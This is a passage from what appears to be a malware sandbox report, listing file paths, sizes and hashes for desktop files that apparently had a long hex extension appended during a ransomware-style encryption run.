SHA11b127671df2026f77e883888e39880223691518e
SHA256fb85357609ea635f228549fc5daa7fb5634fe9ff08b3aa5d4a54063e11df2383
SHA512aa8da170d30c2085acc39d434883d3ba45315b61540b21507bccf4ce26f307715419457dd2d6c819413b0ba0f9e8924aa16667e86889bda68693f070831a7f00
-
Filesize
1KB
MD5958c0e9b5a063226c6baae31a590169d
SHA1dd80bb0911eeaf0248a9eef8948db1ea85d09c9a
SHA256b5285ad951438b4bc646d4ab7fa3801541ea19bf635a4c4367c3658500b1c52e
SHA51246f4c02bedce3ce630ea862a87a50df50db607d3fae938680b160fb77bc0edb0695125be99b0231c3842f26403dd1d223de75738721d841a7ce9124a1c1ccd03
-
Filesize
1KB
MD5115b812f01c26111b9c4ac0fdd3d9b6d
SHA1c8cb4b6cf0b1f398eddf6cde7aa5ae9b2a05a854
SHA256bcfef0c94ae42e4e14be34eefcc766101796a616ef7a338c9a34114d8e9982fe
SHA512fa4f36d0e506c1afc3dd10e2c4378ba8ecd5d0cdcf861128ef4b84b4c1ffecb1163c476c4ec8ae3ecda15a97af81cef5434f7ba904b27b5bfe2686abdafb27bb
-
Filesize
16B
MD56752a1d65b201c13b62ea44016eb221f
SHA158ecf154d01a62233ed7fb494ace3c3d4ffce08b
SHA2560861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd
SHA5129cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389
-
Filesize
11KB
MD5bfc9e9ec333da908732ac45cd54128d4
SHA10be9ff2aa3cbf350340be552566926611de901b3
SHA256d35fc481a0f658509239afc94126ded8dc2f178e1527f8f856b973a0ea8e88e9
SHA512b9991ef7079c2db57d3ea1f5df1e1118b589d2bda71745558537f60b109b723c17102c6247491cc72985cd206275efdbf022976b794f346282234899fbffba88
-
Filesize
11KB
MD58370da02264dffea5146d132284e897d
SHA163f0d22c877565fad5fbf46e34284fbf5c3eb74a
SHA2563b85e2d6d1347d4c26ca5eb0a6029450cd13fed8b16cb0d37958a4de65b284e2
SHA512518049a1540f6d8cc55bb9a76b130fadc0568a6f4ca19276f835e99054282636e04b54796a8be9f5b44f98cf6b628223cdb3c36950befcc0e315392e9e6c5107
-
C:\Users\Admin\Desktop\ClearCompare.htm.4A7DF4FBD275F2737E85CEEB95025C3599DC88654F65DE0D4E5D119535ECF134
Filesize378KB
MD54eba9df4f5573becc4d1b20c0515550c
SHA176e79c566ce6374029f079b925d880829a8e9829
SHA256247453a5e1de84fbf8aa0bdd0cf9213fd98a8acb63b37be5484af60019465e8b
SHA5129bfebb9a0d5830df5795f5062073460ee9d34ac4df0378faffb188c775b0635c326e625f5328de7b8782e8b022f42bedb13bce86132eec1956709e5a5782593a
-
C:\Users\Admin\Desktop\ClearUnpublish.temp.4A7DF4FBD275F2737E85CEEB95025C3599DC88654F65DE0D4E5D119535ECF134
Filesize594KB
MD5ba064e1207575ca0fd55316bce762e60
SHA14021d1c7acabf8e4bb36a624b6c8bd122c7c5a59
SHA25677d6d09a711dbda43c851711b790f888541430efb94e0e7f29438f192b3d1449
SHA51237fe141c5ae077055472b78d9c0c328033ba08cf3cd88c8005ba42168409eb100e3e6a91e02f51fbb8a1c0cd59c55d5c06b64e46363c46dcc2e88744e49b94af
-
C:\Users\Admin\Desktop\ConvertToSubmit.sys.4A7DF4FBD275F2737E85CEEB95025C3599DC88654F65DE0D4E5D119535ECF134
Filesize819KB
MD56be3a96d5498df4648c9479bb5efc571
SHA1eb8e796a08e0c916a054d2733c8ff28ec64cd7db
SHA25620727ea0c33ce6703eb128325bf72076f7edb5a30d68f2b45ac964c8d0f856f5
SHA51226be78b622cecb3f2fd809099b1a0f3c9cbafa036ac2cfe50bc8e9ae74c1f2bc124a7c85559e0fa4e6d6098e24acff954d325a6b89ce0ae9f17543629d5cc904
-
C:\Users\Admin\Desktop\DismountGet.docx.4A7DF4FBD275F2737E85CEEB95025C3599DC88654F65DE0D4E5D119535ECF134
Filesize17KB
MD51035a4440f953a67ed1ab9cea3edf479
SHA11a60ecb9c790987d007c5d48178807980344926d
SHA2568c823ddb91c7f30554a5de9610582b790bd8a7bc7c77c5064d11d29a2282bf6c
SHA512dfd04b9543b99f51e9659af20f112f8676d4f6d897f83a29371012430a2390a11df5911e1164af95f10fbc1ee38271d2d8187d7af36924194018e52c87a4a0b5
-
C:\Users\Admin\Desktop\FormatInitialize.wax.4A7DF4FBD275F2737E85CEEB95025C3599DC88654F65DE0D4E5D119535ECF134
Filesize270KB
MD50aeb94d61c3794241de395df22932d89
SHA1ddc34da60afc0e7a566a85a103a1aed9a6e15a3e
SHA2565844432bb8940b72e2f143bc5c746dc9e86d4033da5a6b647a9e4ec71e175361
SHA512e5824b96f224758412f8c1b37af765f23ca76fb71420720a4e73d424358976aa009368ca2651d6e6148ca255e53585f8d985d495d3ba53bec77d6b2dfec0ce13
-
C:\Users\Admin\Desktop\GroupSet.ods.4A7DF4FBD275F2737E85CEEB95025C3599DC88654F65DE0D4E5D119535ECF134
Filesize301KB
MD55de769fba19e16b2ddd63a64dce762b3
SHA1d32992c800970f46cc5b4339e1efb9bc4ecfab34
SHA256999538227a6dda2771bad5e8a81c9447c55fc411ed7c77dbe98937f4ceff9f00
SHA512f7064696820b8e162bc379071907f239c798d414b6b8df4c516eeba090ae20045ddc5ce9f88c2ef453a50accfbfa9b018669f7e390af8fddf0ad894c92797005
-
C:\Users\Admin\Desktop\HideSelect.rm.4A7DF4FBD275F2737E85CEEB95025C3599DC88654F65DE0D4E5D119535ECF134
Filesize455KB
MD5a4030f70d9aa269ceb58655e72de3b39
SHA12b4349db9711e348610e56417f5a9356442a937b
SHA256d234aba8d9e432ebf30c161df68c6fd3e827a557377685b0d64b3a5b9f698326
SHA512722ce0c3e5f758e0cdafa2de46e593b23f7d0693ea30c73f2c3c9ddda537f31f79a6068a41f538eb61a2353de8610c3ee552a3c3a7dd1942a2cf5d88bdecc856
-
C:\Users\Admin\Desktop\InstallReset.mp4.4A7DF4FBD275F2737E85CEEB95025C3599DC88654F65DE0D4E5D119535ECF134
Filesize254KB
MD5788eefe437261636ec095acabba03b83
SHA11e332f6f75b958715ac359a33bb0ead0a3692aca
SHA256b70eaf61970bb65c8bcadb124c0afb065c85d42ce4fd1214dc8e244023d99516
SHA512c5bda2890c44a7c38439576d51df97618894e76fce33afc084d55d6c86992cd397ff52810c389094a878cb4dde83666f0ea68712bdc4f1639f8e780cf921912c
-
C:\Users\Admin\Desktop\MoveShow.docx.4A7DF4FBD275F2737E85CEEB95025C3599DC88654F65DE0D4E5D119535ECF134
Filesize14KB
MD5f0f1284ca2068669e6d27687c3c2d5eb
SHA1830f51b9bd730411a1d15b414476021c343f4fb4
SHA25639861cadc015d28ca63780aace55493d3efc3f86a4ce4ab589faa8bf5d488903
SHA5125ef3383560f64c414402ec9142d1f8e0eaf1674ceb8d1108d1f9f5b06c12dd112504532238e0ff1c02db83c28b4e236a9411de9308d144716c953364ce561b4c
-
C:\Users\Admin\Desktop\NewConfirm.crw.4A7DF4FBD275F2737E85CEEB95025C3599DC88654F65DE0D4E5D119535ECF134
Filesize517KB
MD5212be35009c7d175cd62013ee2bee4dc
SHA170fc2d1ec74d41a0eb95aa67dac890d516b3499c
SHA25634554a684c0d8fe38f4fbba6961748656cd0e3b33c841876fbb4372337eb0ca4
SHA5125dc2f964541f31907ed5b7034ec3b25df525bb1c846b564e1fe68ddcb7ed060d1bc7019385747bd329fa602e4fac9a5f7a80e03145db32c0b45d25648fe35351
-
C:\Users\Admin\Desktop\OptimizeImport.wax.4A7DF4FBD275F2737E85CEEB95025C3599DC88654F65DE0D4E5D119535ECF134
Filesize424KB
MD56589e6b59bf7350f3799d5780a96d897
SHA12d2c98ae824587f3508fe0fdd2afbdd2ddc6f441
SHA256521d78615428f22f9a9d58cde2a88870d0f11e54f2a081d698d8eb540c722367
SHA51226646f3bbf49200c56be8dba87881cb8ea3173dab071f68a9100471ddad5935e035e6b0d1964355c3950f2b2b94df71e46b598a1d8510455e2f4af53abc066c5
-
C:\Users\Admin\Desktop\PushFind.doc.4A7DF4FBD275F2737E85CEEB95025C3599DC88654F65DE0D4E5D119535ECF134
Filesize486KB
MD56eaca1023cbc396eddfaec86077b74a4
SHA169b1a8631d3a3c7bfc98467158fca69f062dd7c2
SHA256c85137df0a9c84761f6b8a8a9250e41c7f069b31006da59a234064b1a6f2398f
SHA5120386234109c0063e94d714cbb089ab00e7bd4eae8be6fbc4fca8bcefc348d7df5d44775b9bff9185bf733260472d6ad60b845d4ccf240f993a5b8aa20f03355a
-
C:\Users\Admin\Desktop\ReadFormat.edrwx.4A7DF4FBD275F2737E85CEEB95025C3599DC88654F65DE0D4E5D119535ECF134
Filesize409KB
MD5817ba635768854c3d8a8227ffac1fd43
SHA1c71efbabad3c456f7c6152c680d8cdce723bed22
SHA256b1f29950aabcc2b9eb1befab9b696a198e576192b230479b5d0095156b430f32
SHA51206b77ad1743410f666d10c60c927949d6da3078f5ae612c96b1b3004f052deafd2132c20b09fb802af27db831474d310864b186395c905c950a231f0ac4f4321
-
C:\Users\Admin\Desktop\RemoveCompress.bin.4A7DF4FBD275F2737E85CEEB95025C3599DC88654F65DE0D4E5D119535ECF134
Filesize332KB
MD553b9085d707b21b12f8d707ab9d812b7
SHA19cb675c37f1d55ef69b5d87dab3f7ef1cca30ac4
SHA25601a6555f669cb4369399d312c28ad1fab1537b9d63246bc24139c47f09a2e0ca
SHA512ae59318ab9f7dd9d096f908f3910c1d2a3fd340e766ffa0939116222dc9fccb6375291ffd82401b2d2ab5d1249ce68c156895d5a60ee7d225bdc4186d5f2dafc
-
C:\Users\Admin\Desktop\ResetSplit.TS.4A7DF4FBD275F2737E85CEEB95025C3599DC88654F65DE0D4E5D119535ECF134
Filesize285KB
MD55c8baf0221477cd86df54c75c4e3cda2
SHA1853f4de4a4043450cdd3c807fcba9fcd1c790e5b
SHA256ec5cbb964c8889350b1fc6c701d8d9ff6a451f5e5ec4a0b2640580acbbb7136e
SHA51230ce5ace3e62be9ef144119c5fd6d9c290177c6e7fdee16aeb2f7889f03ff651ce782faa05d27120ef7d72059773241ab5306e41f693c2290944ecf62aa88f4c
-
C:\Users\Admin\Desktop\ResizeRead.mpeg3.4A7DF4FBD275F2737E85CEEB95025C3599DC88654F65DE0D4E5D119535ECF134
Filesize363KB
MD58ebfdc358c8129fdfe19412b7d96a92c
SHA16d4f33f8d920b762f937217a3b04b1d784bef0b1
SHA25646b6fdc15aff28928cd2163465bfb02cd1b81741fe4cd7cb4fe5d0c4062e1d83
SHA512b613d9c47b801638229a6bc8ceb7e695ae507b11c24144078a985585f1175e6aed54008f6635c562a83810b12e39f348369978498fa52ac0b58a63b1ccceb7ed
-
C:\Users\Admin\Desktop\RestartDebug.mp2v.4A7DF4FBD275F2737E85CEEB95025C3599DC88654F65DE0D4E5D119535ECF134
Filesize563KB
MD5bf8ed151f4c598813162d27cb1ba4c5d
SHA197ece23b78d865645e34786ffc90556cfec06e24
SHA25615f6f09f2bb96e3ddf6df22dd83a2533661417e8b2830cfe960ad400ae2fee8a
SHA512ce65f3a1913efdc788a2d075c578a1fd120c8a2a61c9c6c1f1225e8d191575f8eff1471c54c149ed796033ca11d3a32e47dffa37cea896b9c56a284ca28b19a0
-
C:\Users\Admin\Desktop\RestartRemove.xlsx.4A7DF4FBD275F2737E85CEEB95025C3599DC88654F65DE0D4E5D119535ECF134
Filesize15KB
MD566a640017f056ff39d0e27b67a9266fc
SHA1678e888782252981cca73fad658e26c59de5058a
SHA256aecc127b38cdfb3fc4206f91b22810e1d2f1a6f9feeba1be55676fdb487bece6
SHA512fbdd44f39da1d0f2e09fa0202db7be937de85e0406a41508b12f6062ac2632603599fce31ecd3b9782c04e878fc4feb5884d16e8fb39756c9cd90a1fddb263bb
-
C:\Users\Admin\Desktop\ResumeInstall.css.4A7DF4FBD275F2737E85CEEB95025C3599DC88654F65DE0D4E5D119535ECF134
Filesize533KB
MD5486c2628575ac210898e4a752b2c7163
SHA158513cc49e3e3b2276e8285942595da972c5967d
SHA25632137aeef7af3cc3dc351d235839184738ec33d001ae83671478e23141360ac2
SHA5128544227ac80b110bc025c3a61210cd329a73054608c3652541f0b36bfcbfed9d4c3b3999c004bc8cdcb41ddbf4bd50c11b081fb53225668bb9967328e59bb7d4
-
C:\Users\Admin\Desktop\SendSwitch.mp3.4A7DF4FBD275F2737E85CEEB95025C3599DC88654F65DE0D4E5D119535ECF134
Filesize471KB
MD5ef93a43903b1810a144eef47791b6922
SHA1a4411df90f408952dccf724874a094864a5cb30a
SHA256a0fee122dc6627abb51938303f7118490f98eea79f8ecc66b6f7bce267fdd7df
SHA512010960af21480a6981d6119f210e6bad769732032942ff1ce63b29c6109a3b464dd75e4607efefe2c0d8f94c484be9a43ee1b4c3035b0857ad8e7581be76efc5
-
C:\Users\Admin\Desktop\ShowCompare.odt.4A7DF4FBD275F2737E85CEEB95025C3599DC88654F65DE0D4E5D119535ECF134
Filesize394KB
MD51b36f6cb16708422fa989879de6a4086
SHA1ee1da5d241296f08b6a968c19bce6f848e7dd6e8
SHA2565ed3440bdf03694c0b6f975536ab8b74a36aedb760d403b0dbb5983b61090687
SHA512745e7157b0f0687903db38f7f284604d61766b0ae08ba6b3de1c7e2c90fba58c1d78f6b128912f80500f6d9c64e153a4871062e42f815ac1572734317ad4623d
-
Filesize
224KB
MD560a1b1f2e1491104fc15394ec8c9c116
SHA17cff23765e40f269170a78ea2933d1919f32f688
SHA2565bbfcb62d5f48d2e7a3fe7df1b56f385a3fe520f5d7563f8f82e132ac5259fc8
SHA5128261af05ec012daba03fb706500865bc2c436f001ae40a603e261a07469bc39a5bfe64166d7edb7c3e40cdfd2890876f8afd53b98fbbf4c159c1643715ae7c7f
-
C:\Users\Admin\Desktop\SyncExit.edrwx.4A7DF4FBD275F2737E85CEEB95025C3599DC88654F65DE0D4E5D119535ECF134
Filesize347KB
MD559f71484130ea22705af9fc3d02a66da
SHA180fd00b134d7d78ac68d90c71e10a08ed94645fb
SHA256e44a93e018ff5cd87251673a9292c426a394a7869d6110ac355b45d8e95261a0
SHA512c5de47c3aad29444c459889076c6b1b6397fd451aaf943c5a4f3c385982fc72e333d1c642c46f6d98040e4394158b559070c28ef473c4249eb96021b641b80a5
-
C:\Users\Admin\Desktop\TestDeny.dib.4A7DF4FBD275F2737E85CEEB95025C3599DC88654F65DE0D4E5D119535ECF134
Filesize316KB
MD564fca5bee603a9448b586d17094d94be
SHA16e7ad0f265a5d26e08b7bd5330f555d85a3dd12c
SHA256b0c8285e61a99e2c98d002b1bca1887221b90b05751f8db217810f5c05060c9d
SHA5122a95887cbec658f63d6079c85e7251de6cce614cee776f7dbc74e293796215f6eabb64acdad5e5920d9d31027fcdc8f8194f0d29b3a36a6dcd1c43f9c874488a
-
C:\Users\Admin\Desktop\UnregisterCompress.mhtml.4A7DF4FBD275F2737E85CEEB95025C3599DC88654F65DE0D4E5D119535ECF134
Filesize579KB
MD568598d7fd01eee979be69253410fb42a
SHA16c83a6962cc99c07958e4e8c0d016367b2cf5bf3
SHA256f056e04c25adee5335ed731b560811dfbd26dcaf84ddd95534c7fd158ad72d6c
SHA51203d7c59ff3f6369c024fcdad274620957279a0e2b983a4199d267d44407191b11ee5eb153b33e6008404463d01f91356f612206a98320d970ebc8f51a90fd670
-
C:\Users\Admin\Desktop\UpdateConnect.wmf.4A7DF4FBD275F2737E85CEEB95025C3599DC88654F65DE0D4E5D119535ECF134
Filesize440KB
MD5efa6fb99e7c61f949dd9d91a8c496d3b
SHA1335973fdf308bf8403673efd9a14814ac00e95a1
SHA2565dc42e5be47659893c78b40eb91e65d22357d35bf6c10560cf1509ada70aaec7
SHA5127dff03e056c91c4798c3eea10fd23470b700a727975f9933e62acaaf14cd7026038cd9cd74918f683ac343e3ab0a0f5ccfba38e955126c404069d3159e96117b
-
C:\Users\Admin\Desktop\WatchResize.txt.4A7DF4FBD275F2737E85CEEB95025C3599DC88654F65DE0D4E5D119535ECF134
Filesize502KB
MD5e0dd2bc65f2cf374fe8ab202a2546dcc
SHA1f824aa595bb69cea2652b77be71cc103cfd8af16
SHA25626aa74b17cc7a7d5c9b3d0887109e1324849f26ccf7e64518da7a67310139dcc
SHA512e0322b74032095d30efdc955074a60eef64f299586197e175b7a1c4fc892dceaa6ec7e3943dcebc362ed6c4db97be35cc0e07665aa2f056341cdd954eb45f509
-
Filesize
33KB
MD55569bfe4f06724dd750c2a4690b79ba0
SHA105414c7d5dacf43370ab451d28d4ac27bdcabf22
SHA256cfa4daab47e6eb546323d4c976261aefba3947b4cce1a655dde9d9d6d725b527
SHA512775bd600625dc5d293cfebb208d7dc9b506b08dd0da22124a7a69fb435756c2a309cbd3d813fc78543fd9bae7e9b286a5bd83a956859c05f5656daa96fcc2165